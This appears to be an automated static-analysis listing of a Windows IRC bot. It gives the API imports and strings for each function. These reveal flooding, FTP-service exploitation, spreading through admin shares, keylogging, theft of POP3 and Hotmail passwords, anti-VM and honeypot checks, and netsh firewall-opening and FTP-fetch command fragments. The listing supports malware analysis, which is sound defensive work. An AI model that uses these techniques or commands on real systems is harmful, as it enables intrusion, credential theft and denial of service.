sub_outside():
WS2_32.socket
WS2_32.ntohs
WS2_32.inet_addr
WS2_32.connect
WS2_32.closesocket
WS2_32.WSASocketA
KERNEL32.ExitThread
WS2_32.send
WS2_32.recv
KERNEL32.Sleep
KERNEL32.GetTickCount
KERNEL32.MultiByteToWideChar
KERNEL32.WideCharToMultiByte
WSOCK32.recv
NTDLL.RtlAllocateHeap
NTDLL.RtlFreeHeap
KERNEL32.GetVersion
KERNEL32.GetCommandLineA
KERNEL32.GetStartupInfoA
KERNEL32.GetModuleHandleA
NTDLL.RtlReAllocateHeap
NTDLL.RtlSizeHeap
|
sub_42BDC5(011d):
KERNEL32.SetStdHandle
|
sub_429B9A(0126):
KERNEL32.SetUnhandledExceptionFilter
|
sub_41B8E7(0232):
WS2_32.gethostname
WS2_32.gethostbyname
WS2_32.socket
WS2_32.setsockopt
WS2_32.closesocket
KERNEL32.GetTickCount
WS2_32.inet_addr
WS2_32.ntohs
WS2_32.sendto
KERNEL32.Sleep
"Stopped."
|
sub_42ADEC(0251):
NTDLL.RtlDeleteCriticalSection
|
sub_4248E0(031c):
KERNEL32.InterlockedIncrement
KERNEL32.InterlockedDecrement
|
sub_40FCF7(031e):
KERNEL32.lstrcpyA
|
sub_41B424(033d):
ADVAPI32.OpenSCManagerA
ADVAPI32.CreateServiceA
NTDLL.RtlGetLastWin32Error
ADVAPI32.CloseServiceHandle
"\"%s\""
|
sub_40281E(04ee):
KERNEL32.TerminateThread
WS2_32.closesocket
"ExploitFTPD"
"qo1bf0.B7k40Mnsrm1FhS.k."
"%s %s (%d thread(s) stopped)."
"ExploitFTPD"
"qo1bf0.B7k40Mnsrm1FhS.k."
"%s No %s thread found."
|
sub_42ABB1(06bc):
KERNEL32.GetCPInfo
|
sub_428436(075c):
KERNEL32.InitializeCriticalSection
NTDLL.RtlEnterCriticalSection
|
sub_415970(07df):
"_BOT"
"_BOT_LOGIN"
|
sub_41591A(07df):
"USER "
"PASS "
|
sub_426967(0879):
KERNEL32.ReadFile
NTDLL.RtlGetLastWin32Error
|
sub_420BEE(096d):
WS2_32.socket
WS2_32.inet_addr
WS2_32.ntohs
WS2_32.connect
WS2_32.closesocket
KERNEL32.Sleep
"RFB %03d.%03d\n"
"%s"
"%s%d%d%d%d%d.exe"
"cmd /c echo open %s %d >> i &echo user "...
"VNC%d.%d: %s - %s"
"%s"
"%s%d%d%d%d%d.exe"
"cmd /c echo open %s %d >> i &echo user "...
|
sub_40BB43(0a00):
KERNEL32.GetModuleHandleA
KERNEL32.GetProcAddress
NTDLL.RtlGetLastWin32Error
KERNEL32.LoadLibraryA
WININET.InternetOpenA
"kernel32.dll"
"SetErrorMode"
"CreateToolhelp32Snapshot"
"Process32First"
"GetDiskFreeSpaceExA"
"GetLogicalDriveStringsA"
"SearchPathA"
"QueryPerformanceCounter"
"QueryPerformanceFrequency"
"GetComputerNameA"
"user32.dll"
"CloseWindow"
"SendMessageA"
"FindWindowA"
"IsWindow"
"GetClipboardData"
"CloseClipboard"
"advapi32.dll"
"RegCreateKeyExA"
"RegSetValueExA"
"RegQueryValueExA"
"RegDeleteValueA"
"RegCloseKey"
"RegQueryInfoKeyA"
"OpenThreadToken"
"OpenProcessToken"
"LookupPrivilegeValueA"
"AdjustTokenPrivileges"
"OpenSCManagerA"
"OpenServiceA"
"ControlService"
"CloseServiceHandle"
"EnumServicesStatusA"
"IsValidSecurityDescriptor"
"CreateServiceA"
"StartServiceCtrlDispatcherA"
"ImpersonateLoggedOnUser"
"LockServiceDatabase"
"QueryServiceLockStatusA"
"ChangeServiceConfig2A"
"UnlockServiceDatabase"
"RegisterServiceCtrlHandlerA"
"SetServiceStatus"
"GetUserNameA"
"ClearEventLogA"
"ws2_32.dll"
"WSAStartup"
"WSASocketA"
"WSAAsyncSelect"
"__WSAFDIsSet"
"WSAIoctl"
"WSAGetLastError"
"WSACleanup"
"socket"
"ioctlsocket"
"connect"
"inet_ntoa"
"inet_addr"
"htons"
"htonl"
"ntohs"
"ntohl"
"send"
"sendto"
"recv"
"recvfrom"
"bind"
"select"
"listen"
"accept"
"setsockopt"
"getsockname"
"gethostname"
"getpeername"
"closesocket"
"shutdown"
"wininet.dll"
"InternetGetConnectedState"
"InternetGetConnectedStateEx"
"HttpOpenRequestA"
"HttpSendRequestA"
"FtpGetFileA"
"FtpPutFileA"
"InternetConnectA"
"InternetOpenUrlA"
"InternetCrackUrlA"
"InternetReadFile"
"InternetCloseHandle"
"Mozilla/5.0 (compatible)"
"netapi32.dll"
"NetShareAdd"
"NetShareDel"
"NetShareEnum"
"NetScheduleJobAdd"
"NetApiBufferFree"
"NetRemoteTOD"
"NetUserAdd"
"NetUserDel"
"NetUserEnum"
"NetUserGetInfo"
"NetMessageBufferSend"
"dnsapi.dll"
"DnsFlushResolverCache"
"DnsFlushResolverCacheEntry_A"
"iphlpapi.dll"
"DeleteIpNetEntry"
"GetIfTable"
"GetTcpTable"
"GetUdpTable"
"GetNetworkParams"
"mpr.dll"
"WNetAddConnection2A"
"WNetAddConnection2W"
"WNetCancelConnection2A"
"WNetCancelConnection2W"
"shell32.dll"
"SHChangeNotify"
"psapi.dll"
"GetModuleFileNameExA"
"GetModuleBaseNameA"
"EnumProcessModules"
"GetProcessMemoryInfo"
"pstorec.dll"
"PStoreCreateInstance"
"userenv.dll"
"GetUserProfileDirectoryA"
"shlwapi.dll"
"PathRemoveFileSpecA"
|
sub_42719C(0a41):
KERNEL32.HeapCreate
KERNEL32.HeapDestroy
|
sub_42B97D(0b4b):
KERNEL32.MultiByteToWideChar
|
sub_411A5E(0c3c):
WS2_32.send
WS2_32.recv
KERNEL32.Sleep
|
sub_410234(0cc0):
"\r\n"
|
sub_42D64E(0e35):
KERNEL32.LoadLibraryA
KERNEL32.GetProcAddress
USER32.GetActiveWindow
USER32.GetLastActivePopup
USER32.MessageBoxA
"user32.dll"
"MessageBoxA"
"GetActiveWindow"
"GetLastActivePopup"
|
sub_40D622(0fce):
KERNEL32.lstrcpyA
|
sub_414275(102c):
WS2_32.socket
WS2_32.ntohs
WS2_32.connect
WS2_32.closesocket
|
sub_41A60E(103d):
ADVAPI32.RegOpenKeyExA
ADVAPI32.RegQueryInfoKeyA
ADVAPI32.RegEnumKeyExA
ADVAPI32.RegEnumValueA
ADVAPI32.RegCloseKey
"(%.2d) %s\\%s"
"(Default)"
"(%.2d) %s\\%s (%s)"
|
sub_410930(1044):
KERNEL32.GetLocaleInfoA
"%s|"
|
sub_417989(1162):
KERNEL32.CreateToolhelp32Snapshot
KERNEL32.Module32First
KERNEL32.SetFileAttributesA
KERNEL32.OpenProcess
KERNEL32.TerminateProcess
KERNEL32.Sleep
KERNEL32.DeleteFileA
KERNEL32.Module32Next
KERNEL32.CloseHandle
"II/290Eb6G4/TY84s/myQpz0"
"%s Terminated and deleted %s\n"
|
sub_414983(117c):
KERNEL32.GetModuleHandleA
KERNEL32.GetModuleFileNameA
KERNEL32.GetWindowsDirectoryA
KERNEL32.WritePrivateProfileStringA
USER32.CharUpperBuffA
KERNEL32.ExitThread
KERNEL32.CreateDirectoryA
NTDLL.RtlGetLastWin32Error
KERNEL32.SetFileAttributesA
KERNEL32.CopyFileA
"\\system.ini"
"shell"
"boot"
"%s\\wins\\%s"
"%s\\spool\\drivers\\%s"
"%s\\System"
|
sub_42D6D7(1406):
KERNEL32.SetEndOfFile
NTDLL.RtlGetLastWin32Error
|
sub_41D98A(144a):
"d/Jst/MFgyQ."
"eRWc30Qfw.P0"
"86tb/1FSpjg0"
"PlsYM/aEe6v1"
"c7RQ4/xPvel."
"Ob4iQ/KJ5ue."
"NFKNL0nQigY0"
"e0idD0RDw2U/"
"s3dY//JZo6r/"
"PDazX1oDSOh0"
"uc6Wg1OvWVt1"
"dJ9OW/uMRBD."
"P00Ls0K4t.N1"
"l3nYW.D7Tfl."
"Vsz2x/xqJP5/"
"pNb.a/Bfzu60"
"qbwGd0CFxf./"
"2mo7G0.B0qj/"
"1YLId.eJQP01"
"47Ff/020f.0."
"HyOMe/iovtV."
"CwXYh0RYoUv1"
"eAvYh.IC0dc0"
"N1.5f0Do0oH."
"uz3rf.VTKug1"
"I3nCG.v5U4g."
"9bWj..lZ2My0"
"rioCl1kzTWO0"
".SWwg1hqeiI1"
"g3obv.r6j7H/"
"M5sPX.Qp7Lx."
"f9aX112067l1"
".HiOo.5pwEU."
"ajTtz06Ztse1"
"uN3hk0sn58o/"
"QRn4z10ge1I1"
"bVUSO0ed3MW/"
"6x2Ka0buUbB."
"TVJrO1uBGtg1"
"l80re/UvCUe1"
"h1cMQ0wQw5C."
"7Tmte.MEccn/"
"wN7.t/nZA2V/"
"gkYv90Skypy/"
"X2yN5/.2ImZ1"
"N/pbW1sDKiw."
"fDxPB0lEh21."
"vB1r0/N.Arr0"
"uts3o.RfmkS."
"bPYVP.Fw0vY1"
"QXqOg1gOYq80"
"VXA.u/cDD7S0"
"Qc9zS1zGZff0"
"WpuWr.6YFRU/"
"4RmBz/FCic21"
"SC.Co/swLK/."
"WyF3K1fTHKz."
"cwXsH.xFlvu."
"KxOR8.oS17a0"
"sAsD20NmhK50"
"HPmCH0PbQ800"
"LeEs11vPbnf0"
"lbJVg0r.qMb."
"Hj6vo0JRP9Q0"
"r7WRs/qHek.0"
"DuzCb0KgSsv0"
"dQJSO.47pdb/"
"K9V/U/KkuTM/"
"7yfnz0PW11s1"
"nQ.As1Z1SIt/"
"QRn4z10ge1I1"
"iEguD0V/.5/."
"fc9Kk1jX11G."
"DnjQ8/ze3ZW/"
"VI0QA1mvfro1"
"jdZDp05E7aW."
"W3GP6.13AcY1"
"zAT3J.lm3Ge1"
"lJ/am/kZRtP1"
"XZArU0aMxhi."
"rA7E2/hHXPf0"
"Rp4sR11CvR1/"
"ZqrVt0t6nmZ."
"1ShtA0bzFwk1"
"AZcsP.hkiLO."
"iKgEK/kyKJQ1"
"6x7zf1EztnY."
"7otcU0FiC6V0"
"mb05g/VYf8f1"
"FyFlU0jI3XH."
"SbsIp.o7V4B/"
"n3sAa1exPWU1"
"/BURN/P75Wk/"
"XkG84.cESgs."
"pSern1AAGh6."
"UyfOG.DvVnY0"
"p06vq/BFBMo."
"3VVsV1VuRUA/"
"2ONVG1WFjmb1"
"ZqhIJ/ZaEZa."
"KmdIe1UwntQ/"
"UPx0W/cz2EI0QRn4z10ge1I1"
"V6jBH0k4u/d."
"B2smo.WHkeW.QRn4z10ge1I1"
"X4Cty1aEQwX/"
"Em42x.1IsZI1"
"ERNNi/HM17T1QRn4z10ge1I1"
"Zk1Tr0lpP5R0"
"6ldRA/K4kDS/"
"X.62C.3LDCP/"
"wt4Rn/WGL6V."
"Xxulc08O9rf0"
"FEpMF/ZswFD/"
"sUd8h/rsu8j1"
"j2yYw.J09XC/"
"43uCS0rkQUx."
"ZjIqO/07c2/0"
"a4pll/aQpBg."
"NN0i61uJg7H1"
"eAvYh.IC0dc0"
"uFbSS0Cbo8C."
"NoaZx1Alvg/0"
"h/08./drzWX."
"qo1bf0.B7k40Mnsrm1FhS.k."
"g4XSw0jA5mx."
"wXBrG.Rpy8y.TY84s/myQpz0"
"qnQb5/bavH1.Mnsrm1FhS.k."
"Fr3NB0Ttxid1Mnsrm1FhS.k."
"iVRum..LtyN0X9DHH1k06Rd1"
"II/290Eb6G4/TY84s/myQpz0"
"68gmp/wceS//Mnsrm1FhS.k."
"yUoHi/GMFZv/"
"X1PIk/rO.TL."
"ZRbAx.zPSBs.TY84s/myQpz0"
"RA/Mr15qAbm1"
"PnmNw.7RScG0"
"BSXRM1GM35a0TY84s/myQpz0"
"ckdai0Gd9lr."
"OPC9A1upRd41IwhIm0ocHBf0"
"SmO3C0MCu8j.xfK1r.VuQwI."
"tOVrF/YuzFI1Mnsrm1FhS.k."
"8nIOw/w5nRT1"
"m7P/c1xaudB1TY84s/myQpz0"
"iaZcN0Rz/rw0xfK1r.VuQwI."
"fr5ye08Wltp1Mnsrm1FhS.k."
"8sXNG.tDfrt/"
"75bQQ0i7ucW0"
"i7LwU1UbY8A0"
"2FUlS/VPAyI0"
"CWje81ZpYQ1.TY84s/myQpz0"
"XtyrE1.RJaR.xfK1r.VuQwI."
"ZsHqZ13bZ2w1"
"JJc1c1nn0bL0TY84s/myQpz0"
|
sub_41EF5E(156a):
KERNEL32.GetWindowsDirectoryA
KERNEL32.lstrcatA
KERNEL32.CreateFileA
KERNEL32.GetFileTime
KERNEL32.CloseHandle
KERNEL32.SetFileTime
"Shell"
"SOFTWARE\\Microsoft\\Windows NT\\CurrentVe"...
|
sub_4130E5(15c8):
KERNEL32.GetModuleHandleA
KERNEL32.GetModuleFileNameA
KERNEL32.GetFileAttributesA
KERNEL32.SetFileAttributesA
KERNEL32.CopyFileA
NTDLL.RtlGetLastWin32Error
KERNEL32.DeleteFileA
"IPC$"
"PRINT$"
"S$"
"NETLOGON$"
"B$"
"C$"
"D$"
"E$"
"F$"
"G$"
"H$"
"I$"
"J$"
"K$"
"L$"
"M$"
"N$"
"O$"
"P$"
"Q$"
"R$"
"T$"
"U$"
"V$"
"W$"
"X$"
"Y$"
"Z$"
"C:\\WINDOWS$"
"GUEST$"
"C:\\WINNT$"
"C:\\WINNT\\system32$"
"C:\\WINDOWS\\system32$"
"D:\\WINNT$"
"D:\\WINDOWS$"
"SECLOGON$"
"SYSTEM$"
"WINDOWS$"
"SQL$"
"IIS$"
"drivec$"
"FTP$"
"DOWNLOADS$"
"SYSVOL$"
"LPT1$"
"SITA$"
"%s%d%d%d%d%d.exe"
"%s\\%s\\%s"
"%s %s: -> [%s\\%s, %s/%s] (CreatedServic"...
"RA/Mr15qAbm1"
"(Blank)"
"(Blank)"
"%s %s: -> [%s\\%s, %s/%s] (NetSchedJobAd"...
|
sub_42CACA(1610):
KERNEL32.CreateProcessA
NTDLL.RtlGetLastWin32Error
KERNEL32.WaitForSingleObject
KERNEL32.GetExitCodeProcess
KERNEL32.CloseHandle
|
sub_414810(16aa):
KERNEL32.GetModuleHandleA
KERNEL32.GetModuleFileNameA
KERNEL32.ExitThread
"firewall set portopening TCP 1013 BS"
"netsh"
"open"
"firewall set portopening TCP 8080 PORT1"...
"firewall set portopening TCP 8081 PORT2"...
"firewall add allowedprogram \"%s\" workst"...
"firewall set allowedprogram \"%s\" workst"...
|
sub_418436(1830):
KERNEL32.OpenProcess
NTDLL.RtlGetLastWin32Error
KERNEL32.lstrcmpiA
KERNEL32.CloseHandle
"%s"
"Error: <%d>"
"%s / %s\n"
|
sub_4128D4(1838):
KERNEL32.CreateFileA
KERNEL32.WriteFile
KERNEL32.Sleep
KERNEL32.ReadFile
KERNEL32.CloseHandle
KERNEL32.CreateEventA
NTDLL.RtlGetLastWin32Error
KERNEL32.WaitForSingleObject
"."
"\\\\%s\\pipe\\BROWSER"
|
sub_42B2E6(18d1):
KERNEL32.GetModuleFileNameA
|
sub_4015FC(18f8):
"%d.%d.%d.%d"
|
sub_42BF9A(197b):
KERNEL32.CreateFileA
NTDLL.RtlGetLastWin32Error
KERNEL32.GetFileType
KERNEL32.CloseHandle
|
sub_401477(1a86):
KERNEL32.GetTickCount
KERNEL32.GetModuleFileNameA
KERNEL32.CreateThread
KERNEL32.Sleep
"PnmNw.7RScG0"
"%s Started,Port: (%i), File: (%s)"
|
sub_40FBDB(1a9d):
WS2_32.send
|
sub_424450(1ade):
KERNEL32.GetFileAttributesA
NTDLL.RtlGetLastWin32Error
|
sub_414F1C(1b1a):
KERNEL32.ExitThread
|
sub_41F01F(1c01):
KERNEL32.GetModuleHandleA
KERNEL32.GetModuleFileNameA
KERNEL32.lstrcpyA
SHLWAPI.PathRemoveFileSpecA
KERNEL32.lstrcmpiA
KERNEL32.GetFileAttributesA
KERNEL32.SetFileAttributesA
NTDLL.RtlGetLastWin32Error
KERNEL32.Sleep
KERNEL32.CopyFileA
|
sub_40FFB4(1d82):
WININET.InternetGetConnectedState
KERNEL32.Sleep
WS2_32.socket
WS2_32.gethostbyname
WS2_32.ntohs
WS2_32.connect
WS2_32.closesocket
KERNEL32.GetTickCount
KERNEL32.lstrcpyA
"%s %s\r\n"
"=Z\\"
"8HJ"
"%s %s * 0 :%s\r\n"
|
sub_4016B4(1e67):
WS2_32.inet_ntoa
WS2_32.socket
WS2_32.ntohs
WS2_32.ioctlsocket
WS2_32.connect
WS2_32.select
WS2_32.closesocket
|
sub_41740C(1f42):
KERNEL32.FreeLibrary
|
sub_418A1B(1fde):
"%0.2d:%0.2d"
|
sub_41FA42(205c):
ADVAPI32.GetUserNameA
USER32.CharLowerA
KERNEL32.GetComputerNameA
"TU-4NH09SMCG1HC"
"roo"
"snort"
"honey"
"honeyc"
"honeyd"
"HoneyMule"
"vmware"
"currentuser"
"nepenthes"
"(IMail 8.00 153-1) NT-ESMTP Server X1"
|
sub_4214AA(20bd):
KERNEL32.WriteFile
|
sub_428E88(232b):
"PATH"
"\\"
|
sub_415702(236b):
"!* SH"
"!* UDP"
"!* PAN"
"!* PUSH"
"wget"
"phpshell"
"[MAIN]:"
"[SCAN]:"
"[FTP]:"
"[TFTP]:"
"[KEYLOGGER]:"
"[VNC]:"
|
sub_41580E(236b):
"m7P/c1xaudB1TY84s/myQpz0"
"IRC Operator"
"now a network administrator"
"PRIVMSG"
"JOIN"
"OPER"
"PONG"
"PING"
"USERHOST"
"NOTICE"
"TOPIC"
"PASS "
|
sub_42A731(25cf):
KERNEL32.InterlockedIncrement
KERNEL32.InterlockedDecrement
|
sub_41FE93(26d4):
KERNEL32.GetSystemDirectoryA
KERNEL32.ExitThread
KERNEL32.Sleep
KERNEL32.SetFileAttributesA
KERNEL32.CreateFileA
KERNEL32.GetFileTime
KERNEL32.CloseHandle
KERNEL32.SetFileTime
"%s\\drivers\\tcpip.sys"
"68gmp/wceS//Mnsrm1FhS.k."
"%s TCPIP.SYS version is wrong."
"L"
"C"
"G"
"68gmp/wceS//Mnsrm1FhS.k."
"%s Cannot open TCPIP.SYS, version %d."
"68gmp/wceS//Mnsrm1FhS.k."
"%s TCPIP.SYS fixed, version %d."
|
sub_41EA1B(2792):
WS2_32.gethostname
WS2_32.gethostbyname
KERNEL32.GetTickCount
WS2_32.socket
WS2_32.inet_addr
KERNEL32.ExitThread
WS2_32.ntohs
WS2_32.sendto
KERNEL32.Sleep
"%s Error sending to %s."
"75bQQ0i7ucW0"
|
sub_401EA5(27f1):
KERNEL32.MapViewOfFile
KERNEL32.UnmapViewOfFile
|
sub_401408(285e):
WS2_32.inet_ntoa
"RA/Mr15qAbm1"
"%s (CIP): %s"
"RA/Mr15qAbm1"
"%s Inactive"
|
sub_421D6B(2cad):
"invalid string position"
|
sub_41101E(2d2d):
KERNEL32.GetTickCount
"|"
"P"
"%.2d"
|
sub_418F30(2d2e):
WININET.InternetGetConnectedStateExA
"%sMB"
"%sGB"
"%sKB"
"Yes"
"No"
"qnQb5/bavH1.Mnsrm1FhS.k."
"%s (Connection): %s, (IntIP): %s, (ExtI"...
"(Country): %s. "
"(Bandwidth): Downloaded: %s, Uploaded: "...
|
sub_41B575(2d5e):
ADVAPI32.OpenSCManagerA
ADVAPI32.OpenServiceA
ADVAPI32.LockServiceDatabase
NTDLL.RtlGetLastWin32Error
KERNEL32.LocalAlloc
ADVAPI32.QueryServiceLockStatusA
KERNEL32.LocalFree
ADVAPI32.ChangeServiceConfig2A
ADVAPI32.UnlockServiceDatabase
ADVAPI32.CloseServiceHandle
|
start(2ea5):
KERNEL32.GetTickCount
"RA/Mr15qAbm1"
"%s (Stats):"
" (%s: %d),"
" (EFTPD): (%d), Total -> (%d in %s)"
|
sub_40274D(2eb9):
KERNEL32.GetModuleFileNameA
WS2_32.send
WS2_32.closesocket
"rb"
|
sub_41F7BE(2ff0):
ADVAPI32.OpenSCManagerA
ADVAPI32.EnumServicesStatusA
NTDLL.RtlGetLastWin32Error
ADVAPI32.CloseServiceHandle
|
sub_4010E7(31e8):
KERNEL32.GetTickCount
"%c%c%c%c%c%c"
|
sub_414FE3(3267):
KERNEL32.GetModuleHandleA
KERNEL32.GetModuleFileNameA
KERNEL32.CreateThread
KERNEL32.Sleep
|
sub_410AB7(33d8):
KERNEL32.GetLocaleInfoA
KERNEL32.GetVersionExA
"95"
"NT"
"98"
"ME"
"2K"
"XP"
"2K3"
"Vista"
"%s|%s|%c%c%c"
|
sub_401311(346f):
"."
"x"
"0"
"x"
"0"
"x"
"0"
"%s.%s.%s.%s"
|
sub_41F331(34a6):
KERNEL32.GetTempPathA
KERNEL32.GetModuleHandleA
KERNEL32.GetModuleFileNameA
KERNEL32.SetFileAttributesA
KERNEL32.CreateFileA
KERNEL32.WriteFile
KERNEL32.CloseHandle
SHELL32.ShellExecuteA
"%s\\removeMe%i%i%i%i.bat"
"@echo off\r\n:Repeat\r\ndel \"%s\">nul\r\nping "...
"@echo off\r\n:Repeat\r\ndel \"%s\">nul\r\nif ex"...
|
sub_4153BB(3588):
KERNEL32.GetLogicalDriveStringsA
"Drive Totals (N/A), Total: %s%s,Free: %"...
|
sub_414926(3700):
KERNEL32.ExitThread
"(Debug): opened netsh firewall for FTPD"...
"firewall set portopening TCP %d FD"
"netsh"
"open"
|
sub_412EB7(3766):
ADVAPI32.OpenSCManagerA
ADVAPI32.CreateServiceA
ADVAPI32.StartServiceA
KERNEL32.Sleep
ADVAPI32.DeleteService
ADVAPI32.CloseServiceHandle
NTDLL.RtlGetLastWin32Error
ADVAPI32.OpenServiceA
"ServicesActive"
"%s\\%s\\%s"
"%d%d%d%d%d"
|
sub_401F1D(379a):
KERNEL32.MapViewOfFile
KERNEL32.UnmapViewOfFile
|
sub_42071B(37c7):
WS2_32.send
|
sub_41B537(3851):
KERNEL32.CreateThread
KERNEL32.WaitForSingleObject
KERNEL32.CloseHandle
KERNEL32.ExitThread
|
sub_42075C(3ac0):
WS2_32.send
|
sub_4015B4(3b1d):
WS2_32.ntohl
|
sub_410720(3bdb):
"'TF"
|
sub_401F6E(3c64):
KERNEL32.MapViewOfFile
KERNEL32.UnmapViewOfFile
|
sub_40CDE2(3f9e):
WININET.InternetOpenUrlA
KERNEL32.CreateFileA
WININET.InternetCloseHandle
KERNEL32.ExitThread
KERNEL32.GetTickCount
WININET.InternetReadFile
KERNEL32.WriteFile
KERNEL32.CloseHandle
SHLWAPI.PathRemoveFileSpecA
NTDLL.RtlGetLastWin32Error
KERNEL32.CreateProcessA
KERNEL32.WaitForSingleObject
KERNEL32.CreateThread
KERNEL32.Sleep
WS2_32.WSACleanup
KERNEL32.ExitProcess
"%s Couldn't open file for writing: %s."
"SmO3C0MCu8j.xfK1r.VuQwI."
"OPC9A1upRd41IwhIm0ocHBf0"
"SmO3C0MCu8j.xfK1r.VuQwI."
"OPC9A1upRd41IwhIm0ocHBf0"
"SmO3C0MCu8j.xfK1r.VuQwI."
"OPC9A1upRd41IwhIm0ocHBf0"
"%s File download: %.1fKB to: %s @ %.1fK"...
"SmO3C0MCu8j.xfK1r.VuQwI."
"OPC9A1upRd41IwhIm0ocHBf0"
"%s File download: %.1fKB to: %s @ %.1fK"...
"%s Couldn't parse path, error: <%d>"
"OPC9A1upRd41IwhIm0ocHBf0"
"OPC9A1upRd41IwhIm0ocHBf0"
"%s Failed to create process: \"%s\", erro"...
"OPC9A1upRd41IwhIm0ocHBf0"
"OPC9A1upRd41IwhIm0ocHBf0"
"%s Created process: \"%s\", PID: <%d>"
"OPC9A1upRd41IwhIm0ocHBf0"
"OPC9A1upRd41IwhIm0ocHBf0"
" hour"
" hours"
" %d%s"
" %.2d:%.2d"
"OPC9A1upRd41IwhIm0ocHBf0"
"%s Process Finished: \"%s\", Total Runnin"...
"Update cmd received: [%s!%s@root]"
"%s Update failed: Error executing file:"...
"SmO3C0MCu8j.xfK1r.VuQwI."
"SmO3C0MCu8j.xfK1r.VuQwI."
"%s Bad URL or DNS Error, error: <%d>"
"SmO3C0MCu8j.xfK1r.VuQwI."
"OPC9A1upRd41IwhIm0ocHBf0"
"SmO3C0MCu8j.xfK1r.VuQwI."
"OPC9A1upRd41IwhIm0ocHBf0"
|
sub_4127E6(4089):
KERNEL32.WriteFile
|
sub_41382E(4089):
KERNEL32.WriteFile
|
sub_41A0E6(40d5):
KERNEL32.CreateThread
KERNEL32.Sleep
|
sub_4285CC(4106):
NTDLL.RtlAllocateHeap
NTDLL.RtlReAllocateHeap
|
sub_418B58(4109):
KERNEL32.GetVersionExA
ADVAPI32.GetUserNameA
KERNEL32.GetComputerNameA
KERNEL32.GetSystemDirectoryA
KERNEL32.GetDateFormatA
KERNEL32.GetTimeFormatA
KERNEL32.GlobalMemoryStatus
KERNEL32.GetLogicalDriveStringsA
KERNEL32.GetTickCount
"???"
"95"
"NT"
"98"
"ME"
"2K"
"XP"
"2K3"
"ViSTA"
"%s %s"
"dd:MMM:yyyy"
"HH:mm:ss"
"Fr3NB0Ttxid1Mnsrm1FhS.k."
"%s (CPU): %I64uMHz, (RAM): %sKB total, "...
|
sub_4108C7(4236):
KERNEL32.GetComputerNameA
"Error"
|
sub_421F16(4529):
KERNEL32.LocalFree
|
sub_41FB50(4546):
KERNEL32.GetModuleHandleA
KERNEL32.LoadLibraryA
KERNEL32.GetProcAddress
KERNEL32.GetTickCount
KERNEL32.IsDebuggerPresent
"KERNEL32.DLL"
"IsDebuggerPresent"
"SOFTWARE\\VMware, Inc.\\VMware Tools"
"InstallPath"
"ShowTray"
|
sub_4152FB(45ab):
"Failed"
"%s Drive (%s): Failed to start, device "...
"%s Drive (%s), Total: %s, Free: %s, Ava"...
|
sub_427054(45c9):
KERNEL32.GetVersionExA
KERNEL32.GetEnvironmentVariableA
KERNEL32.GetModuleFileNameA
"__MSVCRT_HEAP_SELECT"
"__GLOBAL_HEAP_SELECTED"
|
sub_41015C(45e7):
"%s %s\r\n"
"%s\r\n"
|
sub_4146B9(4603):
KERNEL32.lstrcpyA
ADVAPI32.RegOpenKeyExA
ADVAPI32.RegSetValueExA
":*:Enabled:"
"SYSTEM"
"SYSTEM\\CurrentControlSet\\Services\\Share"...
"SYSTEM\\CurrentControlSet\\Services\\Share"...
|
sub_428A39(4634):
KERNEL32.GetModuleHandleA
KERNEL32.GetProcAddress
"KERNEL32"
"IsProcessorFeaturePresent"
|
sub_4170D5(46ce):
KERNEL32.lstrcpyA
|
sub_40C847(493e):
KERNEL32.GetTickCount
WS2_32.socket
WSOCK32.setsockopt
WS2_32.inet_addr
WS2_32.closesocket
WS2_32.gethostbyname
WS2_32.ntohs
KERNEL32.ExitThread
WS2_32.ntohl
WS2_32.sendto
KERNEL32.Sleep
"Stopped."
"8sXNG.tDfrt/"
"%s Done with %s flood to IP: %s. Sent: "...
"wy"
"wak"
"rst"
"won"
"ra"
|
sub_41FDB6(49e1):
KERNEL32.GetVersionExA
KERNEL32.ExitThread
"2"
|
sub_41391C(4b45):
KERNEL32.CreateFileA
KERNEL32.WriteFile
KERNEL32.ReadFile
KERNEL32.CloseHandle
KERNEL32.CreateEventA
NTDLL.RtlGetLastWin32Error
KERNEL32.WaitForSingleObject
KERNEL32.Sleep
"."
"\\\\%s\\pipe"
"\\\\%s\\pipe\\srvsvc"
"."
"\\\\%s\\pipe"
"\\\\%s\\pipe\\browser"
"."
"\\\\%s\\pipe"
"\\\\%s\\pipe\\wkssvc"
"."
"\\\\%s\\pipe\\trkwks"
|
sub_415EA7(4bb2):
KERNEL32.lstrcpyA
ADVAPI32.RegOpenKeyExA
ADVAPI32.RegEnumKeyExA
KERNEL32.lstrcatA
ADVAPI32.RegQueryValueExA
USER32.IsCharAlphaNumericA
"Software\\Microsoft\\Internet Account Man"...
"Software\\Microsoft\\Internet Account Man"...
"\\"
"HTTPMail UserName"
"Hotmail"
"POP3 User Name"
"POP3 Server"
"POP3 Pass2"
|
sub_4120E9(4bb9):
KERNEL32.ExitProcess
KERNEL32.SetErrorMode
KERNEL32.GetModuleHandleA
KERNEL32.GetModuleFileNameA
KERNEL32.lstrcpyA
ADVAPI32.StartServiceCtrlDispatcherA
|
sub_40203F(4d75):
KERNEL32.GetVersionExA
"SeSecurityPrivilege"
|
sub_41186E(4d88):
KERNEL32.GetTickCount
WS2_32.socket
WS2_32.setsockopt
WS2_32.sendto
KERNEL32.Sleep
WS2_32.closesocket
KERNEL32.ExitThread
"Stopped."
"i7LwU1UbY8A0"
"%s done"
|
sub_4248BD(4f5e):
NTDLL.RtlLeaveCriticalSection
|
sub_42486B(4f5e):
NTDLL.RtlEnterCriticalSection
|
sub_41A829(501e):
ADVAPI32.RegOpenKeyExA
ADVAPI32.RegQueryValueExA
ADVAPI32.RegCloseKey
|
sub_41AD33(5369):
"erased"
"g4XSw0jA5mx."
"erased"
"g4XSw0jA5mx."
"erased"
"erased"
"g4XSw0jA5mx."
"%s Total shares %s: [%d]"
"created"
"wXBrG.Rpy8y.TY84s/myQpz0"
"Unloading"
"wXBrG.Rpy8y.TY84s/myQpz0"
"%s No shares %s."
" Total shares [%s: %d]"
"wXBrG.Rpy8y.TY84s/myQpz0"
"%s Total shares [%s: %d]"
|
sub_40FC2B(541d):
KERNEL32.lstrcpyA
|
sub_429BA7(547a):
KERNEL32.LCMapStringW
KERNEL32.LCMapStringA
KERNEL32.MultiByteToWideChar
KERNEL32.WideCharToMultiByte
|
sub_417149(54fa):
KERNEL32.lstrcpyA
KERNEL32.Sleep
"iaZcN0Rz/rw0xfK1r.VuQwI."
"%s %s"
": "
|
sub_418812(5525):
KERNEL32.GetCurrentThread
ADVAPI32.OpenThreadToken
KERNEL32.GetCurrentProcess
ADVAPI32.OpenProcessToken
ADVAPI32.LookupPrivilegeValueA
ADVAPI32.AdjustTokenPrivileges
NTDLL.RtlGetLastWin32Error
KERNEL32.CloseHandle
"SeDebugPrivilege"
|
